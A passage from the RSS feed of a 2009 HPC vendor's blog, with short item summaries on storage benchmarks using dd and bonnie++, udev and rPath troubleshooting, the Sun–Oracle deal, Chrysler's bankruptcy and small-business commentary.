      <description>We run into some interesting things as a business. We have a good set of products showing best in class performance, and price performance, not to mention expansion capabilities and localized computing power. We have partners and resellers. We resell some of their product, providing feedback on opportunities, why we win or lose, and resellers, some of whom do the same for us.
We try to stay out of non-differentiable markets.</description>
    </item>
    
    <item>
      <title>Twitter Updates for 2009-05-08</title>
      <link>https://blog.scalability.org/2009/05/twitter-updates-for-2009-05-08/</link>
      <pubDate>Fri, 08 May 2009 07:05:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/05/twitter-updates-for-2009-05-08/</guid>
      <description>* Mmmm nice shiny reboot button ... mmm wanna press it .... mmm .... oops ... there goes an hour of work ... (DOH!!!!) [#](http://twitter.com/sijoe/statuses/1729615374) * loading a customers system, over the network, from an iso image, on my laptop. 800 miles away from them. [#](http://twitter.com/sijoe/statuses/1729635255)  Powered by Twitter Tools.</description>
    </item>
    
    <item>
      <title>Happiness is ... a JR4 tearing through an octobonnie ...</title>
      <link>https://blog.scalability.org/2009/05/happiness-is-a-jr4-tearing-through-an-octobonnie/</link>
      <pubDate>Thu, 07 May 2009 02:28:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/05/happiness-is-a-jr4-tearing-through-an-octobonnie/</guid>
      <description>This is a very stressful benchmark for a server. A single bonnie++ run can generate user loads of 3-5 depending upon system configuration. And bonnie++ wants &amp;hellip; no &amp;hellip; insists on using 2x ram per run. So even if you run 8 at a time &amp;hellip; and have, lets say &amp;hellip; I dunno &amp;hellip; 128 GB ram &amp;hellip; 2x RAM is 256GB. 8 of these is about 2TB of space. Sure enough &amp;hellip;</description>
    </item>
    
    <item>
      <title>that udev issue?  Self-inflicted...</title>
      <link>https://blog.scalability.org/2009/05/that-udev-issue-self-inflicted/</link>
      <pubDate>Wed, 06 May 2009 03:50:58 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/05/that-udev-issue-self-inflicted/</guid>
      <description>I might have a point about udev. A reasonable point. But the problem appears to be one or the other packages we installed. Retried it on my sacrificial machine here at home. No IB cards, but I was able to boot our stable kernel after installing the Mellanox OFED. I&amp;rsquo;d prefer to use our OFED build, and looks like I&amp;rsquo;ll be able to do that. By self inflicted I mean that I ran the installer script one too many times.</description>
    </item>
    
    <item>
      <title>Its over ... including the shouting</title>
      <link>https://blog.scalability.org/2009/05/its-over-including-the-shouting/</link>
      <pubDate>Wed, 06 May 2009 03:43:41 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/05/its-over-including-the-shouting/</guid>
      <description>SCO&amp;rsquo;s chapter 11 looks like it will be turned into a chapter 7 liquidation. Litigation is rarely a rational business plan. You actually have to own assets that other people have purloined. If you don&amp;rsquo;t own the assets, and other haven&amp;rsquo;t stolen the assets you don&amp;rsquo;t own &amp;hellip; its a little harder to claim you have been done wrong. Look for the assets they do own to be auctioned off to pay creditors.</description>
    </item>
    
    <item>
      <title>Confirmation of earlier post info ... I had hoped it was untrue ...</title>
      <link>https://blog.scalability.org/2009/05/confirmation-of-earlier-post-info-i-had-hoped-it-was-untrue/</link>
      <pubDate>Tue, 05 May 2009 20:41:02 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/05/confirmation-of-earlier-post-info-i-had-hoped-it-was-untrue/</guid>
      <description>This link pretty much covers it.
This is a bankruptcy, an ordered re-ordering of a company. It is a well practiced procedure. Everyone will get hurt, though the non-secured creditors, by law, will get hurt worse, and the equity holders are basically wiped out. This is the way things go. Except for Chrysler. Where very specific non-secured creditors are actually getting ahead, and secured creditors are getting something else. Ouch. Rumor had it that HP had given Chrysler a sweetheart deal on their last cluster.</description>
    </item>
    
    <item>
      <title>Udev should never, ever hang</title>
      <link>https://blog.scalability.org/2009/05/udev-should-never-ever-hang/</link>
      <pubDate>Tue, 05 May 2009 18:17:49 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/05/udev-should-never-ever-hang/</guid>
      <description>Udev is a /dev population tool. Enables devices to be hotplugged, and it adapts the system to the changes by running commands and scripts. Udev runs upon reboot. And in the background courtesy of libevent, it handles changes as they occur. Except, every now and then, something goes arwy with UDev. Like it hangs. So booting stops. Cold. With no way around it. Sort of our BSOD. Just as inconvenient. What you can do about it is fairly interesting.</description>
    </item>
    
    <item>
      <title>Twitter Updates for 2009-05-04</title>
      <link>https://blog.scalability.org/2009/05/twitter-updates-for-2009-05-04/</link>
      <pubDate>Mon, 04 May 2009 07:05:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/05/twitter-updates-for-2009-05-04/</guid>
      <description>* Burning in a 128GB 16 core JR for a customer. Getting 1.7 GB/s sustained large block reads, 1.4 GB/s sustained large block writes [#](http://twitter.com/sijoe/statuses/1691205092)  Powered by Twitter Tools.</description>
    </item>
    
    <item>
      <title>It didn&#39;t take long for this to descend into a mess</title>
      <link>https://blog.scalability.org/2009/05/it-didnt-take-long-for-this-to-descend-into-a-mess/</link>
      <pubDate>Sun, 03 May 2009 22:57:45 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/05/it-didnt-take-long-for-this-to-descend-into-a-mess/</guid>
      <description>I had mentioned Chrysler&amp;rsquo;s bankruptcy previously. What was being reported, whereby the unsecured creditors were making out much better than the secured creditors, simply didn&amp;rsquo;t strike me as making sense. I thought the secured creditors would simply say no, and force the issue in court. Which appears to be what they are doing. The only &amp;ldquo;winners&amp;rdquo; if you can call them that, are the unions, who, as unsecured creditors, wound up with 55% of the company.</description>
    </item>
    
    <item>
      <title>The aftermath of the smallest of the big 3 going bang</title>
      <link>https://blog.scalability.org/2009/05/the-aftermath-of-the-smallest-of-the-big-3-going-bang/</link>
      <pubDate>Fri, 01 May 2009 12:39:06 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/05/the-aftermath-of-the-smallest-of-the-big-3-going-bang/</guid>
      <description>Its the day after. Detroit has had a 20+% unemployment rate for a while, exacerbated by many factors. It would be fair, and accurate to state that the city has been in a depression for a while. Well, the little &amp;ldquo;surgical&amp;rdquo; bankruptcy is having the ripple effects we knew it would. And it will likely take down several additional companies with it, that were under pressure, but not in terrible shape.</description>
    </item>
    
    <item>
      <title>... and Chrysler goes &#34;bang&#34;</title>
      <link>https://blog.scalability.org/2009/04/and-chrysler-goes-bang/</link>
      <pubDate>Thu, 30 Apr 2009 17:05:01 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/04/and-chrysler-goes-bang/</guid>
      <description>Chapter 11 filing today. Seems that the administration is thinking this will be a fast process. I think the creditors think otherwise. Chrysler may be worth more to them in a Chapter 7 liquidation than a Chapter 11 and section 363 scenario. What does this mean to HPC? Potentially lots. Chrysler, and all of its suppliers and partners use quite a bit of HPC. Keeps costs down. If they emerge, I expect them to use even more HPC.</description>
    </item>
    
    <item>
      <title>Raw unabashed I/O firepower</title>
      <link>https://blog.scalability.org/2009/04/raw-unabashed-io-firepower/</link>
      <pubDate>Thu, 30 Apr 2009 15:00:15 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/04/raw-unabashed-io-firepower/</guid>
      <description>I hit Ctrl-C while testing &amp;hellip; the streaming write
root@jr4:~# dd if=/dev/zero of=/data/big.file bs=16M count=20k oflag=direct ^C15081+0 records in 15081+0 records out 253017194496 bytes (253 GB) copied, 186.973 s, 1.4 GB/s  &amp;hellip; and the streaming read
root@jr4:~# dd if=/data/big.file of=/dev/null bs=16M iflag=direct 10240+0 records in 10240+0 records out 171798691840 bytes (172 GB) copied, 99.0592 s, 1.7 GB/s  Quite nice.</description>
    </item>
    
    <item>
      <title>New JackRabbit being built ...</title>
      <link>https://blog.scalability.org/2009/04/new-jackrabbit-being-built/</link>
      <pubDate>Wed, 29 Apr 2009 16:57:22 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/04/new-jackrabbit-being-built/</guid>
      <description>This one has a nice top output &amp;hellip;
&amp;lt;code&amp;gt; top - 13:36:58 up 7 min, 3 users, load average: 0.03, 0.04, 0.00 Tasks: 196 total, 1 running, 195 sleeping, 0 stopped, 0 zombie Cpu0 : 0.0%us, 0.0%sy, 0.0%ni,100.0%id, 0.0%wa, 0.0%hi, 0.0%si, 0.0%st Cpu1 : 0.0%us, 0.0%sy, 0.0%ni,100.0%id, 0.0%wa, 0.0%hi, 0.0%si, 0.0%st Cpu2 : 0.0%us, 0.0%sy, 0.0%ni,100.0%id, 0.0%wa, 0.0%hi, 0.0%si, 0.0%st Cpu3 : 0.0%us, 0.0%sy, 0.0%ni,100.0%id, 0.0%wa, 0.0%hi, 0.0%si, 0.0%st Cpu4 : 0.</description>
    </item>
    
    <item>
      <title>Wisdom from Down-Under</title>
      <link>https://blog.scalability.org/2009/04/wisdom-from-down-under/</link>
      <pubDate>Wed, 29 Apr 2009 11:42:12 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/04/wisdom-from-down-under/</guid>
      <description>Found this, this morning. As the US and the rest of the world take defibrillator paddles to the economy, and we hear mutterings of class warfare, it is interesting to hear similar sentiments expressed &amp;hellip; globally &amp;hellip; by the people doing the actual job creating. This link is the full story. Good read. I don&amp;rsquo;t have the nice car (I have a 13 year old Jeep), or the huge house. Still in growth mode.</description>
    </item>
    
    <item>
      <title>Day job news</title>
      <link>https://blog.scalability.org/2009/04/day-job-news/</link>
      <pubDate>Tue, 28 Apr 2009 18:13:04 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/04/day-job-news/</guid>
      <description>Nope, haven&amp;rsquo;t been acquired. There is a lot of that going around though (and in some cases, rollups can do good in this market). We are now officially a Cray CX1 reseller (woot!!!) Since my SGI days, I&amp;rsquo;ve really enjoyed working with my Crayon colleagues. The funny thing is that many of the faces are the same. CX1 is a neat product, fits in well with what lots of our customers are doing.</description>
    </item>
    
    <item>
      <title>Highly non-optimally tuned ΔV3 on a simple streaming test</title>
      <link>https://blog.scalability.org/2009/04/highly-non-optimally-tuned-v3-on-a-simple-streaming-test/</link>
      <pubDate>Tue, 28 Apr 2009 17:05:18 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/04/highly-non-optimally-tuned-v3-on-a-simple-streaming-test/</guid>
      <description>Yowza &amp;hellip;
[root@dv3-of coreutils-7.2]# /opt/scalable/bin/dd if=/mnt/data/filesys1/xfs/t/big.file of=/dev/null bs=16M iflag=direct 807+0 records in 807+0 records out 13539213312 bytes (14 GB) copied, 13.2268 s, 1.0 GB/s  Unit has 8 GB ram.
Streaming writes are a bit slower (and direct IO not nearly as efficient for this RAID6).
[root@dv3-of coreutils-7.2]# /opt/scalable/bin/dd if=/dev/zero of=/mnt/data/filesys1/xfs/t/big.file bs=16M count=2k 2048+0 records in 2048+0 records out 34359738368 bytes (34 GB) copied, 82.3577 s, 417 MB/s  For laughs, lets re-read that 34 GB I just wrote out.</description>
    </item>
    
    <item>
      <title>3ware acquired by LSI</title>
      <link>https://blog.scalability.org/2009/04/3ware-acquired-by-lsi/</link>
      <pubDate>Sun, 26 Apr 2009 23:44:05 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/04/3ware-acquired-by-lsi/</guid>
      <description>AMCC looks like they sold their 3ware raid bits to LSI on the 21st of April. 3ware is one of the major lower end RAID suppliers out there. They have a volume business, but like everyone, I suspect AMCC was falling on hard times, and needed to monetize its purchase of 3ware. What does this mean? Probably more consolidation in the storage market. 3ware built its own storage processors. LSI makes storage processors.</description>
    </item>
    
    <item>
      <title>The magical incantation to make rPath linux enable compilation ... about 1/2 way to where we need to be</title>
      <link>https://blog.scalability.org/2009/04/the-magical-incantation-to-make-rpath-linux-enable-compilation-about-12-way-to-where-we-need-to-be/</link>
      <pubDate>Sun, 26 Apr 2009 15:31:04 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/04/the-magical-incantation-to-make-rpath-linux-enable-compilation-about-12-way-to-where-we-need-to-be/</guid>
      <description>I have been quite critical of rPath. I believe rightly so. They make life far too hard for people who need to build code or kernel modules to live patch a system. The documentation for doing this stuff &amp;hellip; really doesn&amp;rsquo;t exist. You are frankly, on your own. So I have spent hours trying to figure this out. And finally, came across the method to get builds to work.
[root@dv3-of arcmsr]# conary update glibc:devel Including extra troves to resolve dependencies: glibc:devellib=2.</description>
    </item>
    
    <item>
      <title>A plan to work around the rPath issues in OpenFiler</title>
      <link>https://blog.scalability.org/2009/04/a-plan-to-work-around-the-rpath-issues-in-openfiler/</link>
      <pubDate>Sat, 25 Apr 2009 11:06:26 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/04/a-plan-to-work-around-the-rpath-issues-in-openfiler/</guid>
      <description>So I was thinking about how to work around the issues I found in OpenFiler. Basically the inability to upgrade drivers is the critical issue. Well, if OpenFiler never touches the hardware, this is much less of an issue. Bear with me.
Basically, we sell JackRabbit as a server or an appliance, and pre-configure it so that our customers can pull it out of the box, stick it into the rack or on the floor, turn it on, and start working.</description>
    </item>
    
    <item>
      <title>Cloudy issues</title>
      <link>https://blog.scalability.org/2009/04/cloudy-issues/</link>
      <pubDate>Sat, 25 Apr 2009 03:04:08 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/04/cloudy-issues/</guid>
      <description>I need to get this out first and foremost. I do believe that cloud computing or similar is inevitable. It is coming. I am also a realist. I know perfectly well that there are some fairly significant impediments to it. The impediments are a mixture of technological deployment, and business models. Its not impossible to do this given sufficient money. But some of the dependencies are simply too pricey to enable rapid cloud adoption, and I don&amp;rsquo;t see this changing rapidly in the near term (next 3 years).</description>
    </item>
    
    <item>
      <title>Detroit:  Where the weak are killed and eaten</title>
      <link>https://blog.scalability.org/2009/04/detroit-where-the-weak-are-killed-and-eaten/</link>
      <pubDate>Sat, 25 Apr 2009 01:03:03 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/04/detroit-where-the-weak-are-killed-and-eaten/</guid>
      <description>Way back in graduate school, my family was in town for my wedding. Back then, Detroit had a reputation &amp;hellip; not a pretty one &amp;hellip; for being the murder capital of the US. Sure made my folks happy I was going to grad school there. So while we were wandering around in Greektown right after a meal, we spent some time in Trappers alley, at a number of stores. One of the stores had a T-Shirt my older brother really seemed to enjoy.</description>
    </item>
    
    <item>
      <title>Acquisition day T &#43; 5: We learn more</title>
      <link>https://blog.scalability.org/2009/04/acquisition-day-t-5-we-learn-more/</link>
      <pubDate>Fri, 24 Apr 2009 23:40:03 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/04/acquisition-day-t-5-we-learn-more/</guid>
      <description>Ok, looks like I was dead on right on some aspects, and likely pie in the sky with others. Here is where I was right. This acquisition was, and is, about Java and MySQL. From The Register yesterday:
Yup. Makes sense.
But also stated &amp;hellip;
&amp;hellip; which they have to do to prevent Sun&amp;rsquo;s hardware sales from tanking pre-close. We know this. And they are going to keep making these noises up until the close.</description>
    </item>
    
    <item>
      <title>Great concept, terrible implementation</title>
      <link>https://blog.scalability.org/2009/04/great-concept-terrible-implementation/</link>
      <pubDate>Fri, 24 Apr 2009 20:31:17 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/04/great-concept-terrible-implementation/</guid>
      <description>I&amp;rsquo;ve mentioned rPath before, as it is the basis for OpenFiler, and other appliances. Now with the mad headlong rush into the misty vapors of cloud computing, they are rebranding as a cloud appliance provider. Their concept is great. Create a functional software appliance, run it everywhere. Thats not what i am going to complain about. Its about the implementation. [rant mode full on] Its always about the implementation. As the implementation is the thing that drives support.</description>
    </item>
    
    <item>
      <title>Amusing story of the day:  yes, someone has tried to scam us</title>
      <link>https://blog.scalability.org/2009/04/amusing-story-of-the-day-yes-someone-has-tried-to-scam-us/</link>
      <pubDate>Fri, 24 Apr 2009 18:55:08 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/04/amusing-story-of-the-day-yes-someone-has-tried-to-scam-us/</guid>
      <description>So there I am waiting for my 3:30pm phone call. Working on a Delta-V for a partner. Get a call from the number 5618260072 Remember that number. This person claimed they were representing Hugh Downs production company and wanted to do a story. Obviously this person had no clue, was reading from a script, and didn&amp;rsquo;t have any research background on us. I was at least amused. One of their questions at the end got me thinking that this person wasn&amp;rsquo;t clueless, but was fishing for something.</description>
    </item>
    
    <item>
      <title>The bell may toll for Chrysler ... next week</title>
      <link>https://blog.scalability.org/2009/04/the-bell-may-toll-for-chrysler-next-week/</link>
      <pubDate>Thu, 23 Apr 2009 21:58:16 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/04/the-bell-may-toll-for-chrysler-next-week/</guid>
      <description>From theNYT, we learn that they are being pushed to a Chapter 11 filing. This is needed, in order to cause a break on some of the really bad contracts and other business elements they have agreed to over the years. Chrysler is a consumer of HPC products. Rumor has it a large (effectively free/risk free) cluster was provided by one of the tier 1s in the last few months. Chrysler has been hammered by the economic downturn, and the effective absence of credit in the market.</description>
    </item>
    
    <item>
      <title>96TB JR5 now available</title>
      <link>https://blog.scalability.org/2009/04/96tb-jr5-now-available/</link>
      <pubDate>Wed, 22 Apr 2009 20:23:20 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/04/96tb-jr5-now-available/</guid>
      <description>96TB raw capacity, 5U high performance storage system with 64GB ram, 8 processor cores, 4x GbE, 2x 10GbE ports, dual hardware accelerated RAID cards, SSD boot drives. For well under $1000/TB. More information coming in the formal announcement this week.</description>
    </item>
    
    <item>
      <title>Acquisition T &#43; 1 day:</title>
      <link>https://blog.scalability.org/2009/04/acquisition-t-1-day/</link>
      <pubDate>Tue, 21 Apr 2009 12:19:39 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/04/acquisition-t-1-day/</guid>
      <description>As John West points out over at InsideHPC.com, the FAQ really didn&amp;rsquo;t live up to FAQ standards &amp;hellip; very little was answered, and there are many more questions. But a pattern did emerge, that fundamentally suggests that we may have been (more) right (than we knew). This acquisition was about MySQL and Java. And other software bits. But no mention of Lustre, and even more important to a larger number of HPC sites, GridEngine.</description>
    </item>
    
    <item>
      <title>Twitter Updates for 2009-04-21</title>
      <link>https://blog.scalability.org/2009/04/twitter-updates-for-2009-04-21/</link>
      <pubDate>Tue, 21 Apr 2009 07:05:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/04/twitter-updates-for-2009-04-21/</guid>
      <description>* The Sun has set: acquired by Oracle after messing up IBM acquisition. Hardware and HPC probably gone. Its Java Larry wanted. [#](http://twitter.com/sijoe/statuses/1565006452)  Powered by Twitter Tools.</description>
    </item>
    
    <item>
      <title>Game over:  Sun snarfed up by Oracle</title>
      <link>https://blog.scalability.org/2009/04/game-over-sun-snarfed-up-by-oracle/</link>
      <pubDate>Mon, 20 Apr 2009 11:23:12 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/04/game-over-sun-snarfed-up-by-oracle/</guid>
      <description>See the PR. Oh my. Imagine one of several scenarios. Scenario 1: All other hardware vendors drop Oracle certification efforts and cease selling Oracle on their platforms as Oracle hasn&amp;rsquo;t stopped directly competing with them.
Scenario 2: Sun hardware largely goes by-by, enmasse, so Oracle can focus upon the bits that make sense for its business, and not piss its partners off too badly. I am guessing it is going to wind up much closer to 2 than to 1.</description>
    </item>
    
    <item>
      <title>&#34;Customer service&#34;</title>
      <link>https://blog.scalability.org/2009/04/customer-service/</link>
      <pubDate>Sun, 19 Apr 2009 02:37:20 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/04/customer-service/</guid>
      <description>Names not used to protect the guilty. We have a motherboard that we bought about 2 years ago now. It was used to run 5310 processors for a build machine for a while. Well, the fist motherboard we had from them, while advertised as compatible with quad core &amp;hellip; wasn&amp;rsquo;t. We had to RMA it to get the right version from this vendor. Well, we had to upgrade the bios recently to support a new card we placed in the machine.</description>
    </item>
    
    <item>
      <title>Extra Extra read all about it ... VC deals in Michigan plummet 70%!</title>
      <link>https://blog.scalability.org/2009/04/extra-extra-read-all-about-it-vc-deals-in-michigan-plummet-70/</link>
      <pubDate>Sat, 18 Apr 2009 20:49:55 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/04/extra-extra-read-all-about-it-vc-deals-in-michigan-plummet-70/</guid>
      <description>Yeah &amp;hellip; thats what is being reported in the Freep. I haven&amp;rsquo;t looked at the latest moneytree numbers from PWC, but from what the author reports,
Yup. You got it. And more to the point, all of the &amp;ldquo;big winners&amp;rdquo; here &amp;hellip; are already funded companies. That is, new company formation, with a VC/Angel assist, is not happening at a pace worthy of mentioning. Specifically
I think they call this &amp;hellip; the long tail.</description>
    </item>
    
    <item>
      <title>I think the fat lady has begun to sing ... IBM rejected Sun&#39;s overatures to restart discussions</title>
      <link>https://blog.scalability.org/2009/04/i-think-the-fat-lady-has-begun-to-sing-ibm-rejected-suns-overatures-to-restart-discussions/</link>
      <pubDate>Sat, 18 Apr 2009 11:38:13 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/04/i-think-the-fat-lady-has-begun-to-sing-ibm-rejected-suns-overatures-to-restart-discussions/</guid>
      <description>Yeah, this is sounding more and more like a Yahoo-redux. So who will play the part of Jerry Yang? According to a report from the Triangle Business Journal,
The journal was summarizing a CNBC report, which I hadn&amp;rsquo;t seen. In these cases, played out in public, unless one party gives a good reason for not resuming negotiating, they are basically holding out to see what the other party will sweeten the deal with.</description>
    </item>
    
    <item>
      <title>A bit of traffic ... for Pegasus!</title>
      <link>https://blog.scalability.org/2009/04/a-bit-of-traffic-for-pegasus/</link>
      <pubDate>Thu, 16 Apr 2009 23:36:01 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/04/a-bit-of-traffic-for-pegasus/</guid>
      <description>someone was apparently looking at our Pegasus GPU+Cell box spec&amp;rsquo;s online &amp;hellip; and told their friends. Most of the comments were ok, though someone thinks this is not a deskside/desktop box. They wrote:
Heh &amp;hellip; Won&amp;rsquo;t dispute the low production piece &amp;hellip; we are not making millions of them. As for a desktop computer? That is most assuredly what this is. See for yourself &amp;hellip; Now imagine throwing even more cores and GPUs at it.</description>
    </item>
    
    <item>
      <title>cluster top</title>
      <link>https://blog.scalability.org/2009/04/cluster-top/</link>
      <pubDate>Thu, 16 Apr 2009 22:24:39 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/04/cluster-top/</guid>
      <description>Well, I wrote a cluster top a while ago, and just installed it for a customer whose cluster we are burning in right now. This is an office cluster &amp;hellip; 48 cores, has to be pretty darned silent, as it is going into an office environment. User needs to see whats running on the cluster. Top is a great interface to this. ctop is getting better.
ctop v0.25: by Scalable Informatics	http://www.</description>
    </item>
    
    <item>
      <title>Reuters on Sun &#43; IBM : &#34;No we really want to be courted&#34;</title>
      <link>https://blog.scalability.org/2009/04/reuters-on-sun-ibm-no-we-really-want-to-be-courted/</link>
      <pubDate>Thu, 16 Apr 2009 10:18:59 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/04/reuters-on-sun-ibm-no-we-really-want-to-be-courted/</guid>
      <description>Yahoo news points to an article on Reuters news service, where it quotes unnamed people familiar with the situation. Very short article, looks more like a backchannel communication method saying &amp;ldquo;come back, we really do want you to court us&amp;rdquo;. I would imagine that some shareholders &amp;hellip; er &amp;hellip; expressed their rather positions, rather emphatically &amp;hellip; to Sun&amp;rsquo;s board. I am sure quite a bit of heat was generated, until the relevant people saw the light.</description>
    </item>
    
    <item>
      <title>Rendevous in Paris</title>
      <link>https://blog.scalability.org/2009/04/rendevous-in-paris/</link>
      <pubDate>Wed, 15 Apr 2009 11:08:08 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/04/rendevous-in-paris/</guid>
      <description>I could say that using a JackRabbit for high performance storage is sorta like this &amp;hellip; :)
Something like this is on my mind when I write about our test tracks, and cracking the throttle wide open..</description>
    </item>
    
    <item>
      <title>10,000 drives for 80 GB/s?</title>
      <link>https://blog.scalability.org/2009/04/10000-drives-for-80-gbs/</link>
      <pubDate>Wed, 15 Apr 2009 00:29:38 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/04/10000-drives-for-80-gbs/</guid>
      <description>Just read this today at the Reg. Argonne has lots of GPUs, and disks. Separated with a big old IB fabric. Hmmm&amp;hellip;. 10,000 disks to get 80,000,000,000 B/s. Hmmm&amp;hellip;. Delivering that to GPUs. Hmmm&amp;hellip;. I think we can do better.
Just 80 of our JR4 units can certainly read and write at that speed, and we can get them 2 GPUs in the same box as the disks. 160 GPUs (Tesla&amp;rsquo;s at that).</description>
    </item>
    
    <item>
      <title>Supercomputing as a Service:  meet Eka</title>
      <link>https://blog.scalability.org/2009/04/supercomputing-as-a-service-meet-eka/</link>
      <pubDate>Mon, 13 Apr 2009 17:42:27 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/04/supercomputing-as-a-service-meet-eka/</guid>
      <description>In this article, the author covers some of what CRL is doing with Eka (pronounced eh-kch). There are some interesting points:
Not sure I agree that it is the first time a corporate institution is doing this &amp;hellip; others have been there before, and some are continuing, such as Tsunamic Technologies. This said, the other point is very much on target.
Most of the governmental backed/based HPC providers are doing so, specifically to further their research.</description>
    </item>
    
    <item>
      <title>Interesting results on potential windows 7 uptake</title>
      <link>https://blog.scalability.org/2009/04/interesting-results-on-potential-windows-7-uptake/</link>
      <pubDate>Mon, 13 Apr 2009 16:47:28 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/04/interesting-results-on-potential-windows-7-uptake/</guid>
      <description>Of course, this is all premature &amp;hellip; windows 7 could turn out to be the greatest thing since sliced bread &amp;hellip; though honestly, I doubt it. Information week reports that 83% of corporate customers do not plan a windows 7 deployment in the first year of availability. Moreover, most are &amp;hellip; happy &amp;hellip; with XP, and will continue to use it, as they are concerned with application compatibility.
That is quite interesting, but not terribly surprising.</description>
    </item>
    
    <item>
      <title>So here is the fortran90 with C problem</title>
      <link>https://blog.scalability.org/2009/04/so-here-is-the-fortran90-with-c-problem/</link>
      <pubDate>Sun, 12 Apr 2009 12:59:17 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/04/so-here-is-the-fortran90-with-c-problem/</guid>
      <description>This is the example I concocted to help demonstrate the problem and help me learn how to solve it. The problem is, I solved this &amp;hellip; without any fancy interface blocks or anything strange like that. Go figure.
The makefile
&amp;lt;code&amp;gt; CC	= icc FC	= ifort LD	= ifort CFLAGS	= -g FFLAGS	= -g LFLAGS	= -g all:	test.exe test.exe:	test_f.o test_c.o $(LD) $(LFLAGS) test_f.o test_c.o -o test.exe test_f.</description>
    </item>
    
    <item>
      <title>Twitter Updates for 2009-04-12</title>
      <link>https://blog.scalability.org/2009/04/twitter-updates-for-2009-04-12/</link>
      <pubDate>Sun, 12 Apr 2009 07:05:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/04/twitter-updates-for-2009-04-12/</guid>
      <description>* Dealing with a very reluctant Fortran90 to C under MPI interface, in preparation for a Cuda port of the C. Mostly done. Array issues... [#](http://twitter.com/sijoe/statuses/1500062985)  Powered by Twitter Tools.</description>
    </item>
    
    <item>
      <title>The $7B question ... that IBM asked</title>
      <link>https://blog.scalability.org/2009/04/the-7b-question-that-ibm-asked/</link>
      <pubDate>Sun, 12 Apr 2009 01:14:53 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/04/the-7b-question-that-ibm-asked/</guid>
      <description>In a Register article, Gavin Clarke asks the obvious questions, and doesn&amp;rsquo;t seem to think the answers are all that great.
Not so sure thats what killed the deal, or if the deal is really dead. No, I have no inside information. I speculate that someone was playing a game of brinksmanship and managed to scupper the deal in front of them. It is still possible to do a deal, but it is going to come in quite a bit less than before.</description>
    </item>
    
    <item>
      <title>On the perceived danger of open source</title>
      <link>https://blog.scalability.org/2009/04/on-the-perceived-danger-of-open-source/</link>
      <pubDate>Sat, 11 Apr 2009 02:45:38 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/04/on-the-perceived-danger-of-open-source/</guid>
      <description>A blog post was written making the argument that, as pricing dropped, so did quality, in software, in patents, in pretty much everything covered. The author suggested that open source will be, effectively, the death of the software industry. Not to mention burying Sun Microsystems. Ok &amp;hellip; I could fisk the post, but its better just to note that too many things are being conflated and confused in the article &amp;hellip; it would take less time to simply point out reality than try to correct what I saw.</description>
    </item>
    
    <item>
      <title>Some losses are more painful than others</title>
      <link>https://blog.scalability.org/2009/04/some-losses-are-more-painful-than-others/</link>
      <pubDate>Fri, 10 Apr 2009 18:50:14 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/04/some-losses-are-more-painful-than-others/</guid>
      <description>We lost our second bid in a week. I&amp;rsquo;ve been trying to figure out why (which is why I often fight a quixotic battle to get information about why we lose when we do). This one was painful as it was at one of my alma maters. So, when we generate pricing for configurations, we use our latest and greatest pricing data from our suppliers. What if, I dunno &amp;hellip; a) the pricing was out of date, and b) the new pricing was much lower than the old pricing?</description>
    </item>
    
    <item>
      <title>[comes up for air] GULP [...]</title>
      <link>https://blog.scalability.org/2009/04/comes-up-for-air-gulp/</link>
      <pubDate>Thu, 09 Apr 2009 22:51:39 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/04/comes-up-for-air-gulp/</guid>
      <description>That was intense. Doug is driving the proposal to Fedex, with minutes to spare before the cutoff. I just love RFPs. No &amp;hellip; really. All the long tedious forms &amp;hellip; and the forms &amp;hellip; did I mention the forms &amp;hellip; and the signatures &amp;hellip; and the forms &amp;hellip; forms &amp;hellip; This is why I have been silent for a few days. My apologies. Will try to catch up tomorrow.</description>
    </item>
    
    <item>
      <title>Curiouser and curiouser ...</title>
      <link>https://blog.scalability.org/2009/04/curiouser-and-curiouser/</link>
      <pubDate>Wed, 08 Apr 2009 00:05:37 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/04/curiouser-and-curiouser/</guid>
